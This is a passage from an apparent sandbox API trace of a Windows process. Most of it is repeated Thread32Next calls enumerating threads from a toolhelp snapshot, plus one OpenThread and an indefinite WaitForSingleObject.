(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.042] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.043] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.044] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.045] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.045] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.046] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.047] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.047] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.048] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.049] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.049] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.050] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.051] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.051] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.052] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.053] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.054] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.054] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.055] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.057] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.057] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.058] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.064] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.400] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.402] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.402] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.404] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.404] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.405] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.407] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.407] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.409] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.411] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.413] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.426] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.427] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.428] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.428] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.429] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.430] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.431] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.431] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.432] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.433] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.434] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.064] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.447] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.449] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.452] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.479] CloseHandle (hObject=0x17c) returned 1 [0226.480] OpenThread (dwDesiredAccess=0x100000, bInheritHandle=0, dwThreadId=0x6d4) returned 0x17c [0226.480] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0xffffffff) returned 0x0 [0264.992] CloseHandle (hObject=0x17c) returned 1 [0264.992] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0265.003] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.017] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.019] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.020] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.020] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.022] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.023] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.025] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.026] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.026] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.027] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.028] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.333] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.334] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.334] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.339] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 